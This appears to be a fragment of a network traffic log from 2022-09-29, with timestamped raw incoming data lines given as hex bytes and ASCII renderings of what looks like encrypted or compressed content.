                                                                                                                                                2022-09-29 12:51:55 UTC32382INData Raw: 59 51 12 34 7e 52 d6 4b 69 67 a2 50 61 90 93 8d 2b ce 30 e7 d2 ee 6f 7c e3 b9 8b 01 64 63 a2 62 80 ce 44 43 c3 2e 9e 14 4f 13 d5 a8 cb b8 fe cc cf b7 b4 97 f1 a3 88 b2 65 7e 60 6f f8 a3 76 7e 2a f5 9f 5f ac 3a 62 ee bb 56 5c f4 66 73 57 37 74 a0 4a 78 b5 d8 d6 6a 9c e7 42 c3 d9 6c 0f 52 b7 d7 2a dd 0a c8 50 ee 38 6b 97 14 8a 38 7d 8e 3a 65 e6 ad 41 b3 94 55 c4 11 7a 43 76 2e 88 ad 87 0b c3 d8 e0 af 67 70 7d 3a 1d e6 86 de 99 90 19 b9 61 5e 9d 3d ee 13 e0 e2 11 d3 31 80 e9 12 7e 40 64 27 4b 73 f3 22 0b 8a fb d3 06 63 e2 a0 70 d0 7d 35 b0 d6 8c d5 9e fa c2 86 4d ed 5c c6 ce 41 63 fb cb 1e 46 87 13 9a c2 c4 3a 36 a9 31 55 1a e1 1f da 0f 3e 1d c9 86 d8 8d ad a7 b9 ac 33 1d fe 28 26 c5 0f ca 8a 06 f4 91 46 1d ac 91 3b 99 fb 96 c6 0f a5 94 8f e3 d4 50 79 c9 b1
                                                                                                                                                Data Ascii: YQ4~RKigPa+0o|dcbDC.Oe~`ov~*_:bV\fsW7tJxjBlR*P8k8}:eAUzCv.gp}:a^=1~@d'Ks"cp}5M\AcF:61U>3(&F;Py
                                                                                                                                                2022-09-29 12:51:55 UTC32384INData Raw: c1 0b ab 79 92 9a 96 9f 68 47 79 2d 0d 88 1a 75 f0 d1 5f e3 ba 94 4f 6b 1a 71 b9 ae 6f b8 6e f1 9f 5f bf 6b 39 a8 41 9d 94 45 43 2d 94 a6 09 8a 29 43 5b de 8d cf 9d 9c 30 15 ed 12 d4 79 df bb 58 d6 bf 8f 0b 8a 66 ff 63 a4 b8 a8 f7 2a 76 23 db e3 74 63 4d 24 5f 6e 11 51 b3 65 27 45 12 d3 a6 ab a8 75 03 4e d4 81 f2 7d 47 fd e0 b2 af 4f bc 81 71 1f 1d c2 7f 0b f0 18 c5 6c ea 61 ee c8 1b 63 11 c1 36 5c fd 8b e1 04 d2 3c 9b 62 1b 00 2d 1f 0a 45 c2 a0 3a e5 31 42 dc ef 78 bd 74 5f b6 9b 87 a2 05 4f 7a 25 6d 85 14 8f 00 cb e6 ec d9 19 20 76 65 0e d1 ee 5c 55 a7 14 23 4c d4 29 08 19 91 c1 27 72 df bd 40 a9 eb 56 aa 25 28 cc 19 2a 42 62 19 99 b7 83 35 83 8d 47 09 d3 40 eb 34 db 60 f3 8b 96 da c8 18 0a 38 10 7d 8c 16 97 af 2b 00 cc 1b dc 5d 65 39 76 23 69 12 e0 c4
                                                                                                                                                Data Ascii: yhGy-u_Okqon_k9AEC-)C[0yXfc*v#tcM$_nQe'EuN}GOqlac6\<b-E:1Bxt_Oz%m ve\U#L)'r@V%(*Bb5G@4`8}+]e9v#i
                                                                                                                                                2022-09-29 12:51:55 UTC32385INData Raw: 00 8b a5 95 b4 7a 4f cf bd d5 ff 93 24 95 97 e2 d3 75 8c 32 2c 2a e0 75 8d fc 7f f6 59 e8 3c 61 0c 6b bc b8 66 5f 13 83 bb 2d a0 3d 47 c8 91 c7 a9 f8 2c 49 99 3b b6 c3 da 6c ac 76 69 ca 9d e2 ff 9c 40 92 63 15 71 a4 a7 68 c8 80 84 10 2b 91 11 bd f8 30 11 cf d1 e5 96 6c 2c 06 5d 2a a6 f3 95 58 bf ef 85 f6 56 1d 34 45 4f 8f af 64 a4 e4 94 be 81 5f ac e1 52 20 72 94 03 80 aa e6 cd ee c3 fb b2 28 25 31 a5 50 d4 d6 f2 b2 42 ac 65 b1 cf be b4 ec e0 c1 bb 18 45 f0 b0 31 62 ec 42 f8 cf 44 88 3e f6 29 c6 11 3e 8f f6 a3 2e 66 d8 bc 54 33 f7 69 d9 2e ed 9b 23 79 39 30 3c 13 a9 28 d6 8a 5b e8 f6 25 b0 6e 81 a0 90 0f ff 7b 8d c2 61 88 64 aa df a3 a9 ce d6 19 21 95 76 19 9a 3d 34 72 7b d6 f3 e3 f2 9f be 3f c2 02 1d 43 5a f0 7d 87 1a 2b 53 99 7b db 25 96 ee 86 ad fb ad
                                                                                                                                                Data Ascii: zO$u2,*uY<akf_-=G,I;lvi@cqh+0l,]*XV4EOd_R r(%1PBeE1bBD>)>.fT3i.#y90<([%n{ad!v=4r{?CZ}+S{%
                                                                                                                                                2022-09-29 12:51:55 UTC32386INData Raw: f4 e5 b4 91 d8 44 68 05 c7 46 54 cf bf d0 86 af b8 61 8a d6 1d 04 53 17 ea 4c 31 bb 76 92 d6 12 1a ea 97 19 fa 71 b7 cb 0a 44 73 ba 27 fb b3 f9 7a d5 2b 9a c3 45 b2 1c dd fd 88 c2 d3 d2 76 5a 4b f3 69 a0 0d c3 7e cc 5e fb 6c 80 da f8 85 bd 95 0a ac 4e 3b 05 4b bd a4 51 20 60 da 2f 0a 14 a9 84 37 d2 e6 ab da d0 8f 9a e9 4b 99 2f be fb 55 59 18 3a 57 2b 85 94 80 30 db 99 32 6c 2f 0d b4 e9 c2 62 a4 42 f3 03 f3 2c da 0b c2 00 41 51 b5 1a 9f dd 85 e3 a0 58 57 2d 60 01 c5 37 6b 28 9f 9f a7 b2 4c 0c 70 fa 87 59 b5 3b eb db ca 8a 9f 23 cd cd ff e2 a6 68 9f a2 1e 45 77 0a ff 95 f9 95 fc 4f 1f fd e0 ca 50 68 2c 0c 0d ed 7a 5c 51 ff 75 cd 38 0a b5 51 9a 8b ee 92 f8 5f 2f 65 47 7f 1d 7d 52 7e 66 76 2c 6a 55 0e 6f 7b 1f e9 fa 23 61 22 70 e2 5a 9d 92 ef 5c b6 a6 eb 37
                                                                                                                                                Data Ascii: DhFTaSL1vqDs'z+EvZKi~^lN;KQ `/7K/UY:W+02l/bB,AQXW-`7k(LpY;#hEwOPh,z\Qu8Q_/eG}R~fv,jUo{#a"pZ\7
                                                                                                                                                2022-09-29 12:51:55 UTC32388INData Raw: 63 06 9d e1 03 ca 5d ad 09 86 ec 51 e2 8f 7e 99 22 13 4d 86 d0 dc 06 fa 6f 81 51 bf 20 3f b5 9b cd 76 36 7a e2 d5 48 ff 0e 25 65 41 4c 69 62 62 72 d0 f4 82 10 11 17 f7 19 11 57 33 24 98 5f 98 85 3c c4 73 a0 21 9f 94 46 10 f5 8f 55 ac f1 7f 0b f3 59 72 51 e0 9f b7 e9 09 05 78 66 0c 38 e4 06 22 9f 5f 06 b9 ff 1a 1a 5a 21 00 2d 7c ec 25 62 2c f5 d5 c7 37 40 77 ba f0 cf f2 4b f2 53 3d 53 c7 a4 77 5a 3f 6b 6b 23 5f 16 f5 39 5c f6 75 22 ff bf e6 f6 e8 a9 4c 86 85 f0 53 5f 59 73 53 33 49 25 9c a0 59 ad e4 6d d5 cc 8d d5 24 14 7b ea 2b f9 6d 59 ea f7 1e c0 08 22 81 ed 09 a5 f3 13 4e c6 ff 74 d2 30 75 2d d7 bc 3e 9e 41 6d dc 15 66 a3 c8 c8 17 6e d9 ce 2a 61 d5 fd 51 50 23 96 be 86 a0 d6 f3 1d fb 58 e0 1a 82 9b 37 a3 31 92 bc df 71 8d 30 d6 ad cd 62 41 60 ea 05 27
                                                                                                                                                Data Ascii: c]Q~"MoQ ?v6zH%eALibbrW3$_<s!FUYrQxf8"_Z!-|%b,7@wKS=SwZ?kk#_9\u"LS_YsS3I%Ym${+mY"Nt0u->Amfn*aQP#X71q0bA`'
                                                                                                                                                2022-09-29 12:51:55 UTC32389INData Raw: 3b 2f 1a 90 ea 19 4a 80 11 34 c7 78 7a cd 15 ca ec 19 8c 6c 55 e9 02 cd 4f 0d e7 24 14 87 5e 0d b3 b6 4d e6 5d 23 36 6e 43 2e db 5c fd 9e d4 bb e7 25 aa b7 c3 ef 58 51 84 79 b8 5b 9f a2 eb 9e 88 02 92 22 e8 a1 fc c5 98 7e a6 4d dd d3 f0 bd 62 cd 92 5a bd 94 17 ca b8 cd a9 e5 8b b9 54 ee 04 b4 27 b4 9b 58 94 e7 c2 68 bf 21 4c 24 30 8d 95 e7 ed f8 6d 65 3e e8 78 5a 5c ad 56 60 5e 3c d6 90 01 21 95 e5 aa 71 df 20 6c 69 a6 ed 14 16 d4 c4 a5 29 8f 2d 3f 8e 5a 4a 92 cd 1a 05 40 f9 1d 7c 94 f9 d1 17 87 d8 5f 41 cb 20 13 8e 60 d5 e8 d7 ee ea cb 24 2b 1c ac 6b ff 06 c7 1b 72 c4 c7 17 cc b2 ad bd 3b 1d c3 4d d1 6d f7 9f 1f e7 fc ca 15 23 44 0c b0 d5 d6 49 f7 c5 2c 61 93 62 0c c4 22 d8 a9 1c f8 e0 ab b1 c5 a3 88 51 f5 fa aa dd e8 fd 17 d4 27 7c 4b 41 73 f0 09 af 9e
                                                                                                                                                Data Ascii: ;/J4xzlUO$^M]#6nC.\%XQy["~MbZT'Xh!L$0me>xZ\V`^<!q li)-?ZJ@|_A `$+kr;Mm#DI,ab"Q'|KAs
                                                                                                                                                2022-09-29 12:51:55 UTC32390INData Raw: 30 3f 08 ec 8f 58 bf f2 4c 6d dd bd 56 a5 5e b8 6b 48 4d dc 8b 8f 23 01 df 9e 49 5f c0 70 ab b7 e2 fa 77 ee 6d 25 bf 23 b0 bc ca 2d 96 89 f2 92 f5 d7 31 22 2c 4b ca 9a 1b 7e ad 8e 51 5f fc e9 a7 c7 3b 02 6a 4b 63 80 f3 a9 ee 50 dd 8a b4 9e 8d be 43 d4 89 70 16 a4 a3 5e f3 5a 29 d9 5e cb 29 89 e8 1a 8e 9c 44 4e 2d 47 4d c7 37 50 f6 c7 07 4d 6d 88 c1 90 f6 02 fc c0 5f 25 db bf c9 e2 cd 2b e4 33 cb 61 11 50 22 72 59 ad e8 69 c8 5e b6 98 4b 60 40 88 57 49 68 33 8d 33 15 ce c5 ea 15 3b 95 2b f1 87 6e ac 6e 40 12 96 53 02 85 98 4c 91 3c 30 03 bf 0d be a9 e3 02 e8 8d 14 67 14 4c 64 70 27 09 32 12 95 eb 8e 73 e0 9a b1 3c 77 8f 4a 95 08 5c fd 8c 0e dc d2 0c f4 43 08 d6 64 85 69 47 80 f0 fc 03 64 d5 d3 2e ca 54 b6 cb e8 1a cd 31 f8 de cd c7 de ad 57 8e 72 cd 4b c3
                                                                                                                                                Data Ascii: 0?XLmV^kHM#I_pwm%#-1",K~Q_;jKcPCp^Z)^)DN-GM7PMm_%+3aP"rYi^K`@WIh33;+nn@SL<0gLdp'2s<wJ\CdiGd.T1WrK
                                                                                                                                                2022-09-29 12:51:55 UTC32392INData Raw: 97 c5 1c fa 1d e7 c1 90 79 93 83 dc 5a df 0c 2b 33 15 da 8c c5 dd bc da 7a bd 59 b0 48 2d fb 48 f3 5d 44 84 a2 a0 f5 a4 9b 13 2f 99 5c 5f 70 fc ca 87 e6 72 0b 18 20 aa 3a 67 46 28 c2 be 6c eb 4a 15 cc ff 33 6c 5e 10 99 14 a9 d3 37 58 df 79 12 f0 10 c7 e1 5e a5 bc 2c 64 99 66 d3 26 d4 fd cc 11 bc ae 58 01 ba ee 84 cf 68 67 5f 02 14 e5 b6 c6 93 79 60 7f 67 c7 e7 a8 66 fc d1 ae 46 a7 9d ed 8f a7 6b a6 e0 88 ee a2 a5 7c 56 b6 ba d2 ac db bb 49 ee 2f a0 f2 6a 8d 81 94 e3 ca 2c 98 c5 15 15 cd 73 42 5e 81 88 c5 eb 80 ec 2d 1b 18 49 20 20 23 54 97 43 4e 14 8d b4 87 82 e0 23 a3 66 32 b1 49 7a f1 3e 0e 0e c2 67 70 4a 44 b0 06 6b e0 2a f9 26 96 c3 85 64 c6 2f 67 91 3b 98 47 d1 ca 35 ed 02 21 57 1d 1c c7 16 5f cb 3b 0e 41 93 c2 50 6f 12 ae c9 e8 70 af fc 7c a0 45 a8
                                                                                                                                                Data Ascii: yZ+3zYH-H]D/\_pr :gF(lJ3l^7Xy^,df&Xhg_y`gfFk|VI/j,sB^-I #TCN#f2Iz>gpJDk*&d/g;G5!W_;APop|E
                                                                                                                                                2022-09-29 12:51:55 UTC32393INData Raw: b8 01 0c c6 15 b3 ac 8e c7 6b 3c f9 96 8c 62 47 14 c5 d1 ef 47 b6 21 25 ec 49 f4 ff 7c 72 e6 98 be 2d 86 ac dd 59 78 73 4a 06 54 69 3b 40 43 58 a7 bb 53 22 25 d9 af 73 5e 66 4b b8 98 e6 6a e7 53 ea bf e3 54 51 01 90 72 fd 00 42 53 7f 97 63 bb f5 b9 0a 10 a7 b2 b7 26 39 60 c0 c7 ba 0d 97 cf 03 82 a1 ef 6d 74 5c 6c d2 63 1a bc 73 ca 93 29 8f 51 d4 f7 58 6c ea bb 30 4b d2 e6 d4 42 6d 18 20 e6 e3 81 54 7f 3a 68 59 a1 05 29 40 04 61 d4 30 45 29 03 9e 6e de fb 50 98 52 b5 7c 81 5a 8b 85 9f a6 1e 22 54 74 0e 1b 0d bb d5 34 f4 7d 65 ee e3 0e e0 48 72 de d2 00 68 d1 cc b7 0a 25 d1 7e 17 ab 54 cb 7e 7b b8 2c 90 1b a6 9e 96 a7 57 9f 03 de fa 97 d7 77 7c 91 f5 7c 87 a1 c6 6b 15 c6 b5 f0 58 5c dc 29 f9 ef 86 5f 70 84 07 09 4d 58 bf 28 f9 12 5a 05 6a 87 4d a6 23 11 95
                                                                                                                                                Data Ascii: k<bGG!%I|r-YxsJTi;@CXS"%s^fKjSTQrBSc&9`mt\lcs)QXl0KBm T:hY)@a0E)nPR|Z"Tt4}eHrh%~T~{,Ww||kX\)_pMX(ZjM#
                                                                                                                                                2022-09-29 12:51:55 UTC32394INData Raw: 03 bd 48 d3 e7 90 39 25 69 83 7c 59 4d d5 62 2d 8a f4 63 42 3d f3 ed eb ed 56 ef ec ee cb b3 c0 6b 6d 29 92 ff 28 4c 60 77 0e 7c 73 f1 bb d6 9d 9b ed ba 14 35 74 68 03 cd 6e 8a d3 52 db 17 b2 ec 8d b9 2b 4f 81 cc 29 0b 11 04 11 da 2b dc 6a 6b 4f e0 5f c6 81 55 38 7e d7 06 af 09 d4 82 7e fa 7f 90 b5 cb 40 ce 60 f2 28 eb 5f c1 57 28 8d 13 80 5e 53 1b fb 8f 26 67 a7 d1 f9 06 31 85 a9 18 a4 9a 65 fd 8b f7 ad 24 d4 50 b8 4b 29 a5 41 e0 8d 51 cb 9e c1 38 c1 b8 ad a8 4e 72 96 42 72 68 9e 95 f8 32 07 f1 fd 4e ef de a4 c6 82 9b ab f8 dd e1 0a 9e 2c fa 3d eb 0f e2 f0 ef 9a 87 84 ee 47 ee 14 b2 29 3b 5f f1 4d d8 15 7b be 49 71 11 cf 32 46 60 11 1c 66 cb da bd a1 2d 82 52 e5 e0 54 fa ee 97 67 d7 be 9f 73 c0 43 0a 06 f2 0f 32 47 38 4b d9 06 28 73 e6 58 b5 38 49 f5 2f
                                                                                                                                                Data Ascii: H9%i|YMb-cB=Vkm)(L`w|s5thnR+O)+jkO_U8~~@`(_W(^S&g1e$PK)AQ8NrBrh2N,=G);_M{Iq2F`f-RTgsC2G8K(sX8I/
                                                                                                                                                2022-09-29 12:51:55 UTC32395INData Raw: a7 b4 cd 22 51 80 e9 cb 97 ad 97 25 6c 36 c7 82 c9 ab 2c 1d 9d 9e d1 98 f1 10 5a 4a ea e2 b7 05 56 96 55 e3 98 8d f9 ef 23 84 e1 98 61 8b e3 5a e5 c4 ef dc 66 53 ae 4b 2c 9b ae 9f 9f 7b d3 e3 74 d6 51 52 d7 2c c8 e4 42 10 11 98 d0 6c 09 75 1c 7c a1 51 1b ff 11 04 0c ed 7d 4f d6 04 6a 02 0a 39 52 15 66 b7 0a bd 47 97 d8 14 ea fd 3c 84 f3 75 ea f8 a0 5e ae 6f c9 21 9d 31 74 12 dd 47 bb 7e b0 18 93 9d d9 86 3a 11 06 94 ab 79 54 06 f8 bf 62 65 46 bc 7c a0 71 a8 0c d8 1c b8 76 f0 05 92 72 4a ab 46 40 fe b3 d7 fb f7 80 5e 76 cf 37 3e d6 74 64 d8 09 07 b8 84 f0 4f b9 c6 d7 2f 01 58 75 9d 8b c9 33 e3 06 63 ff c4 32 02 bf 6c ca 3f e1 6b c5 83 da 10 1b 4d d8 81 fd dd fd a3 1a 65 19 d8 0e f3 c2 9c 4f 0a d2 6a 0d 92 95 19 85 7e 12 22 6f 19 c1 6b 24 c0 47 42 c6 0d 19
                                                                                                                                                Data Ascii: "Q%l6,ZJVU#aZfSK,{tQR,Blu|Q}Oj9RfG<u^o!1tG~:yTbeF|qvrJF@^v7>tdO/Xu3c2l?kMeOj~"ok$GB
                                                                                                                                                2022-09-29 12:51:55 UTC32411INData Raw: e5 8b 4d 57 03 82 c1 73 3b 3a 0b 5b be 37 3f 12 8a 8a 19 1d aa 5a 01 9f 90 13 f0 8a 0a 58 1f 37 81 a1 10 88 4a c3 59 f9 8b ee 44 64 b1 38 0a e3 15 6e 99 04 d2 33 68 00 68 9a 2a 56 20 09 c7 ec c1 45 b7 c7 ec bd ee 98 b3 63 57 77 7e be 1e 5d ee 7b c3 93 d4 c7 83 20 94 cb 3a 6d 1d 87 25 0c db 15 10 5c 77 d5 9b 59 16 3d 87 98 2e 8b b2 84 63 79 be a4 d7 ff 36 f2 d3 40 fb df c6 3c d0 a5 20 af 0a dc 24 53 4f 7a 60 d5 56 d7 d0 98 3c 74 13 b4 ff c8 95 81 bb 23 cc f1 78 ff 86 6c 9a 8b f0 74 33 8a 1f f9 ae ea 82 26 4c 12 7b 7b 17 8c 57 96 6d 43 33 c2 e7 eb 4b d9 97 b3 b8 d5 9e 7e 4a d9 aa 3a 85 a3 46 39 16 26 05 e5 f3 44 7b fa c8 65 b9 ef b1 7d 81 d9 a0 49 78 54 9d dd ac 29 c9 9e 14 b8 59 95 93 94 1d 5e 11 a5 94 34 59 4a 6a c7 33 f6 0e b9 f6 76 2c ce b2 be df eb fd
                                                                                                                                                Data Ascii: MWs;:[7?ZX7JYDd8n3hh*V EcWw~]{ :m%\wY=.cy6@< $SOz`V<t#xlt3&L{{WmC3K~J:F9&D{e}IxT)Y^4YJj3v,
                                                                                                                                                2022-09-29 12:51:55 UTC32427INData Raw: 17 6f 2d 00 70 03 33 81 8b 71 7d df ca 2e 5a 8d 08 d8 4b 16 7a 72 e5 6f 1e 6f eb f2 a9 2b 10 e8 24 77 65 b2 0e ae 5f 99 bf 36 26 01 80 d6 a2 8a 19 8d 42 1b 58 f1 ac 0c 35 30 de 01 90 ce b4 92 32 7a 8c 19 3c 61 2f 40 d1 9d 57 43 bd 2a 24 92 f4 36 52 28 d1 9d ae 74 a9 3c b5 f0 2f fc 1c cf de 43 7c 13 53 e0 af 4c 3c 23 ab d2 0e 94 66 60 c5 74 49 c4 c4 57 92 00 a7 42 95 d6 8f 0f 70 63 af 72 3c 6d 7e a5 8c c5 ca 23 63 d6 a8 c2 9f 68 b6 fe 5c 11 05 ed ae d0 02 49 2e 14 cd 1f 6b 0e 53 cd 4d 2b 58 b6 f9 62 0e 59 65 24 ff 9d d9 be da 5d 8f b9 97 df 70 c0 24 7c a4 84 34 41 e0 8f 3a 73 60 aa 1f 7e 9a e3 b6 78 a3 80 cc 89 26 bb 45 73 16 42 8d 55 af bd 4c 11 56 56 0f da 31 fb 09 20 b4 a2 d5 1f ef cc 23 34 3c 14 7a 6f 60 5c 37 ee 22 60 9a a8 6f b6 c3 09 09 ad 8d 4f a3
                                                                                                                                                Data Ascii: o-p3q}.ZKzroo+$we_6&BX502z<a/@WC*$6R(t</C|SL<#f`tIWBpcr<m~#ch\I.kSM+XbYe$]p$|4A:s`~x&EsBULVV1 #4<zo`\7"`oO
                                                                                                                                                2022-09-29 12:51:55 UTC32443INData Raw: ee 2a 60 09 30 0e a0 77 40 5a ec 0f a9 4b 05 f2 ce 8c 35 a0 11 72 a8 3f c7 5c a5 cd e8 4a 44 37 6c 55 10 4e 03 10 17 2e 6d db 47 fd d8 a5 0b 07 77 00 50 10 2e cd 23 cf 44 25 ea 84 ac 73 4b 2c c5 d6 84 e0 19 4d 00 79 ae af 3c 73 5e 1d bb ce 40 7b b8 6f cb b8 4a ef 2c 4c a4 f9 10 ad 3b 1e 23 17 9e a8 a2 0c f7 bc fc c5 06 79 05 71 44 6b 90 94 a9 3b 32 5d cb 3c e0 6d e3 4c 5d 30 62 52 bf 1d ee ba c1 8b bc e7 14 cd 3b 3e b2 ee 9c 09 34 3d 0f 20 c6 9f 04 dd 3b f9 5c a0 c7 d4 cc 79 cb 30 e7 63 7d 88 8b d4 61 98 2b f1 2a 54 80 d9 0a 68 bd 40 f9 77 d1 81 51 58 7a 03 91 1a 80 b8 91 1c 57 a5 75 36 94 05 55 ba 85 c2 f2 51 4f fa 81 ce 67 9c 9e b7 20 99 7c 82 ca d8 48 3b 56 cb 2e 3c ec 8a 2d a6 f6 28 dc 70 8a 9b a5 53 0a 46 53 7a 65 6f d8 6d c2 26 1b 21 da 1d e4 48 05
                                                                                                                                                Data Ascii: *`0w@ZK5r?\JD7lUN.mGwP.#D%sK,My<s^@{oJ,L;#yqDk;2]<mL]0bR;>4= ;\y0c}a+*Th@wQXzWu6UQOg |H;V.<-(pSFSzeom&!H
                                                                                                                                                2022-09-29 12:51:55 UTC32459INData Raw: 72 5a 1b 6b 68 fa 1c 08 3b cc 21 ce f2 54 81 ea 22 45 e4 37 94 63 b1 d5 0e 19 81 3d 87 d4 08 4d e7 b4 cc 6f 1d 6b 2c 09 3e 5a 93 ab e8 be d9 36 1d ac 43 12 56 68 ed b8 11 9e ed 60 fb 81 76 1f 4d b3 d0 ad c8 a6 58 8b d6 ef dd c0 f1 9e 5e 7b 1b 20 4f 1f c9 c7 37 f4 93 2e f0 3f cf 35 7b 62 5d 19 db a0 3d 9f bf d3 ae 4d 02 4b 89 23 fd ce f7 0d d0 86 11 6e ac a6 12 32 c6 5a af 98 63 9f 01 d4 35 fd bb 1f 3e a0 44 3b ff 28 8e 52 e2 79 78 c4 ee e8 99 61 84 24 cb 54 a7 b8 13 94 59 b5 bc 1f a1 d1 c1 a3 b9 11 b5 98 97 53 4a aa 8a 6b b8 a0 72 ae c5 d7 ad 9b d3 79 05 e0 95 0d 33 7f 70 0d 7b a9 42 06 d5 cc 68 d6 b0 ef 63 28 87 48 a5 0c c0 a2 9f 57 ef ab 54 c7 c6 f9 93 c3 bf 0e 79 7b 23 75 35 5c 3d fb 5c 1d c0 fd 7a a6 9e 78 6c c5 96 e6 2e 13 9f a8 8e d4 4b 6d 0d 60 12
                                                                                                                                                Data Ascii: rZkh;!T"E7c=Mok,>Z6CVh`vMX^{ O7.?5{b]=MK#n2Zc5>D;(Ryxa$TYSJkry3p{Bhc(HWTy{#u5\=\zxl.Km`
                                                                                                                                                2022-09-29 12:51:55 UTC32475INData Raw: 22 ba b6 ca 50 7a 68 ba 93 64 01 5c 88 90 55 75 5c c4 64 35 39 2d 18 22 1b 70 e3 75 71 74 79 e7 53 de 3f 1f a0 3f f7 81 bb 99 61 83 33 8c 36 8d 42 99 c0 5e 8f 9d 11 8a ef 1d b9 35 4e af 32 3b e8 45 c9 18 7d 1e 42 f3 fd ff f2 da 3f 90 6a 0a 4c d4 01 c3 5e d0 7f 6d b9 85 14 16 5e b2 4d 80 31 09 68 5b 38 1f f8 c0 a6 89 14 59 69 4e ee 91 99 ba eb 34 e6 fe fa cd fe 2a cb 86 45 30 c1 51 66 1b a2 4f c3 d4 48 ea ba 3f 45 2b 6c 84 46 a1 95 68 d9 3c 1f 95 84 6c 43 1b d4 31 10 c1 6f 7f 40 7a a4 2b c3 0d eb c2 6e cd 1b 93 aa 18 ce bc dd 4e d7 bc 81 ca 32 d2 8e aa e2 60 fd 49 52 02 33 22 f3 4d 35 3a d3 2a 25 6b 03 47 b0 3c fe 19 a3 5c 4b 30 e1 cd 75 24 ac c4 15 c3 9d 67 a4 aa 3e c0 89 1a c2 6e 29 d8 79 8b d8 30 f1 d5 90 f3 77 94 f3 f3 5f 82 81 1d 00 bc 40 24 9f f7 b4
                                                                                                                                                Data Ascii: "Pzhd\Uu\d59-"puqtyS??a36B^5N2;E}B?jL^m^M1h[8YiN4*E0QfOH?E+lFh<lC1o@z+nN2`IR3"M5:*%kG<\K0u$g>n)y0w_@$
                                                                                                                                                2022-09-29 12:51:55 UTC32491INData Raw: d3 a3 e2 f7 d8 46 a0 e2 e5 52 57 c1 31 27 7b da 10 d9 df 94 19 06 07 04 ba 02 dc 02 63 1a d6 fb 3e 80 95 6c 4c dc 33 88 6d 8d 38 7f 70 04 a1 7f 44 26 78 eb 39 04 af 00 1f 0f 13 2d ab 9b c6 ac d5 ab 6a b3 49 85 f3 d8 e6 11 d4 52 c0 6a 59 73 d7 ff a6 cd 79 18 39 e1 81 19 79 5c b9 d9 55 42 58 94 91 a8 00 14 2a b1 bc e5 3b b0 08 89 d5 47 74 c0 fd 9e f5 78 79 44 35 24 2e 2e 5f 68 12 19 c2 de 5f 6d ca f0 45 00 1f bd f4 1f 8b cd d6 11 06 97 e0 bb 15 f8 31 5d f6 0d 93 fc 5c 4f 75 5b 87 57 74 c8 65 ad 8c db 9d 55 25 c0 0d 4f 33 94 20 14 67 ce e7 69 ef bb 27 5e 14 68 42 c7 c4 dc fa eb 26 38 18 87 f7 d9 d9 63 a0 52 d2 7f a9 a2 7b 23 a7 ca 26 73 60 88 d3 ae 57 65 f4 d9 a6 86 18 f8 20 d6 4f d7 0f fe 65 34 ae db 76 35 91 63 2b 6b 00 56 e0 23 a0 7b 15 0e 63 22 a5 07 c5
                                                                                                                                                Data Ascii: FRW1'{c>lL3m8pD&x9-jIRjYsy9y\UBX*;GtxyD5$.._h_mE1]\Ou[WteU%O3 gi'^hB&8cR{#&s`We Oe4v5c+kV#{c"
                                                                                                                                                2022-09-29 12:51:55 UTC32507INData Raw: e3 52 b3 1e 38 a1 42 07 15 ed 45 c9 64 9e 3e 78 cf 27 9d e6 8a 2f 30 35 97 a1 8f 2f 23 02 58 5d cf b5 81 74 4a 62 2e 60 67 25 d1 03 24 b7 29 96 ee a4 c0 8f bd d7 18 ef e2 a2 bc b8 12 1f b8 95 d1 9c a2 a8 f2 31 38 01 5e fe a4 cb f5 57 b0 33 d8 7f 23 b4 a1 06 f2 86 a3 d8 75 03 51 7b cd 46 e9 0e 83 a0 f7 fb c2 ac 9c f5 e1 bc 02 58 21 f0 d0 c9 5d 2d 64 e4 ee e5 ca c0 fe d5 e7 8a 1e e1 8a 78 14 87 2d 9a b1 c7 cc 4d c4 6a e8 15 2a ed 84 4f fd e2 74 6b b5 53 24 98 3c ee 71 ea 2c 9d 3c 2d 8f e1 83 64 50 b9 99 a0 84 a2 1e 64 c8 92 d3 29 b1 4a 62 30 97 a5 be e8 e3 1d 4c 86 00 2a f6 df 22 dc 97 75 e2 86 6f 49 36 67 e4 dc 67 f8 0a 81 ec 8b 69 78 75 60 e4 90 07 d4 04 40 8b 57 d2 60 26 6c de 38 af 3a cc 6f e6 63 e2 63 15 af 44 44 6e 81 15 c2 76 fe 9b f9 e7 ce f1 61 e4
                                                                                                                                                Data Ascii: R8BEd>x'/05/#X]tJb.`g%$)18^W3#uQ{FX!]-dx-Mj*OtkS$<q,<-dPd)Jb0L*"uoI6ggixu`@W`&l8:occDDnva
                                                                                                                                                2022-09-29 12:51:55 UTC32523INData Raw: a5 aa 66 fc df 0d 26 5a 73 f0 cb 4d ed 67 57 79 a8 8a 1f 15 fa f4 f8 cc 9b af a6 15 75 54 68 e1 bb bc 8b 79 99 3b cc 33 51 16 f6 fe ec 9d a6 c8 9f 94 8d f0 73 f9 ef 01 aa 2a 6f 01 a3 ca ef 48 45 be 30 58 d2 00 f7 7f 0e 73 15 80 de 9d 87 d7 88 02 e5 a6 c2 ba 42 16 1c 84 d8 80 50 e5 1d 53 59 1a ff db 42 66 8f da 09 2b 80 93 b0 1c ba 17 e0 0d 81 a7 f8 c5 a1 8d 69 bc 56 40 57 83 73 a0 e2 63 7e 57 63 ca 9d 1d 8c fc e8 34 e8 62 f8 9e a3 b8 6e 9e 7c 28 53 16 d4 f2 0a d4 df ee ee fc a2 21 5a 36 95 a2 af ac 26 40 a0 41 97 63 dc eb b9 d2 f4 68 1f 23 f3 32 b5 bd 3a f1 91 ba 1f 90 f2 bb df 3c 4a 80 a3 fd ec 55 1e 9f 9f 64 85 a3 43 37 a8 a1 d3 2a f6 1d 52 63 ce e7 05 e1 29 fd 4d 9c 62 af 08 d1 14 a5 b0 fb 71 6e c5 72 d7 a5 df ae 41 f0 3d 8a 8e 6d 1e 5b 2c d4 04 ff 60
                                                                                                                                                Data Ascii: f&ZsMgWyuThy;3Qs*oHE0XsBPSYBf+iV@Wsc~Wc4bn|(S!Z6&@Ach#2:<JUdC7*Rc)MbqnrA=m[,`
